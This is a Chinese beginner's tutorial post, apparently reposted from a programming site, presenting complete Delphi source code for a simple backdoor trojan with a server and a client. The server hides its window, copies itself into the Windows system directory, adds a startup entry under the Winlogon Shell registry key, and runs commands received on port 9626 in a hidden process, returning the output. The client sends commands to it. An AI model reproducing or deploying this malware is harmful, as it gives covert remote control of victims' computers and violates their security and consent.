Delphi編寫簡單的木馬

剛學電腦時很喜歡網絡安全，看著高手們寫的一個又一個攻擊工具，自己也總想努力去學好編程去寫屬於自己的程序。學Delphi快一年了，感覺什麼都沒學到，慚愧啊。今晚突然想學著寫木馬，於是手忙腳亂的敲了點代碼，超簡單，願自己能越寫越好！！！

程序跟傳統木馬一樣，分服務端和客戶端。運行服務端後會復制自身到SYSTEM32目錄下面，並在注冊表添加一自動行啟動項，打開本機9626端口開始等待接收客戶端的數據。當接收到客戶端數據時就當作CMD命令去執行，最後把回顯傳送回客戶端。客戶端很簡單，跟服務端連接成功後，輸入命令點執行，正常的話可以收到服務端的執行結果了。

源碼如下：

////Server.pas//////////////

unit UtMain;

////////////////////////////////////
//////////BY lanyus////////////////
////////Email:[email protected]////
////////QQ:231221////////////////
///部分代碼從網上收集///////////
////////////////////////////////

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, Registry, ScktComp, StdCtrls;

type
  TFmMain = class(TForm)
    SS: TServerSocket;
    Memo1: TMemo;
    procedure FormCreate(Sender: TObject);
    procedure SSAccept(Sender: TObject; Socket: TCustomWinSocket);
    procedure SSClIEntRead(Sender: TObject; Socket: TCustomWinSocket);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  FmMain: TFmMain;
  reg:TRegistry;

implementation

{$R *.dfm}

procedure TFmMain.FormCreate(Sender: TObject);
var
sysdir:array[0..50] of char;
begin
  Application.ShowMainForm:=False;
  FmMain.Left:=-200;          //運行不顯示窗口
  reg:=TRegistry.Create;
  reg.RootKey:=HKEY_LOCAL_MacHINE;
  reg.OpenKey('SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon',true);
  if reg.ReadString('Shell')<> 'Explorer.exe Lysvr.exe' then
    reg.WriteString('Shell','Explorer.exe Lysvr.exe');   //建立開機啟動項
  reg.Free;
  GetSystemDirectory(sysdir,50);
  if not FileExists(sysdir+'\Lysvr.exe') then
    copyfile(Pchar(Application.exeName),pchar(sysdir+'\Lysvr.exe'),true);

SS.Port:=9626;
  try
    SS.Active:=True;
  except
  end;
end;

procedure TFmMain.SSAccept(Sender: TObject; Socket: TCustomWinSocket);
begin
  Socket.SendText('連接成功');   //發現有連接時回傳‘連接成功 ’
end;

procedure TFmMain.SSClIEntRead(Sender: TObject; Socket: TCustomWinSocket);
var
RemoteCmd:string;
hReadPipe,hWritePipe:THandle;
si:STARTUPINFO;
lsa:SECURITY_ATTRIBUTES;
pi:PROCESS_INFORMATION;
cchReadBuffer:DWord;
ph:PChar;
fname:PChar;
res:string;
begin
  Memo1.Clear;
  remotecmd:=Socket.ReceiveText;
  fname:=allocmem(255);
  ph:=AllocMem(5000);
  lsa.nLength  :=sizeof(SECURITY_ATTRIBUTES);
  lsa.lpSecurityDescriptor  :=nil;
  lsa.bInheritHandle  :=True;
  if  CreatePipe(hReadPipe,hWritePipe,@lsa,0)=false  then
  begin
    socket.SendText('不能創建管道');
    exit;
  end;
  fillchar(si,sizeof(STARTUPINFO),0);
  si.cb:=sizeof(STARTUPINFO);
  si.dwFlags:=(STARTF_USESTDHANDLES  or  STARTF_USESHOWWINDOW);
  si.wShowWindow:=SW_HIDE;
  si.hStdOutput:=hWritePipe;
  StrPCopy(fname,remotecmd);
  /////執行CMD命令////
  if CreateProcess(nil,fname,nil,nil,true,0,nil,nil,si,pi)=False then
  begin
    socket.SendText('不能創建進程');
    FreeMem(ph);
    FreeMem(fname);
    Exit;
  end;
  while(true)  do
  begin
  if  not  PeekNamedPipe(hReadPipe,ph,1,@cchReadBuffer,nil,nil)  then  break;
  if  cchReadBuffer<>0  then
  begin
  if  ReadFile(hReadPipe,ph^,4096,cchReadBuffer,nil)=false  then  break;
    ph[cchReadbuffer]:=chr(0);
    Memo1.Lines.Add(ph);
  end
  else
  if(WaitForSingleObject(pi.hProcess  ,0)=WAIT_OBJECT_0)  then  break;
    Sleep(100);
  end;
  ph[cchReadBuffer]:=chr(0);
  Memo1.Lines.Add(ph);    //memo接收回顯
  CloseHandle(hReadPipe);
  CloseHandle(pi.hThread);
  CloseHandle(pi.hProcess);
  CloseHandle(hWritePipe);
  FreeMem(ph);
  FreeMem(fname);
  socket.SendText(Memo1.Text);  ///將回顯發送回客戶端
end;

end.

///////////////////////////////////////////////////////////////////////////////////////////

//////客戶端/////////////////////

unit UtMain;

////////////////////////////////////
//////////BY lanyus////////////////
////////Email:[email protected]////
////////QQ:231221////////////////
////////////////////////////////

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, OleCtrls, SHDocVw, StdCtrls, IDBaseComponent, IdComponent,
  IdUDPBase, IdUDPServer, Buttons, TLHelp32, ScktComp;

type
  TFmMain = class(TForm)
    WebBrowser1: TWebBrowser;
    Label3: TLabel;
    Edit2: TEdit;
    Label4: TLabel;
    Edit3: TEdit;
    Button2: TButton;
    CS: TClIEntSocket;
    Edit4: TEdit;
    Label5: TLabel;
    Memo1: TMemo;
    BitBtn2: TBitBtn;
    procedure Button2Click(Sender: TObject);
    procedure CSRead(Sender: TObject; Socket: TCustomWinSocket);
    procedure BitBtn2Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  FmMain: TFmMain;

implementation

{$R *.dfm}

procedure TFmMain.Button2Click(Sender: TObject);
begin
  CS.Host:=Edit2.Text;
  CS.Port:=StrToInt(Edit3.Text);
  CS.Open;
end;

procedure TFmMain.CSRead(Sender: TObject; Socket: TCustomWinSocket);
begin
  Memo1.Clear;
  Memo1.Lines.Add(Socket.ReceiveText);
  Memo1.Lines.Add('');
end;

procedure TFmMain.BitBtn2Click(Sender: TObject);
begin
  CS.Socket.SendText(edit4.Text);
end;

end.

本文來自編程入門網：http://www.bianceng.cn/Programming/Delphi/200705/937.htm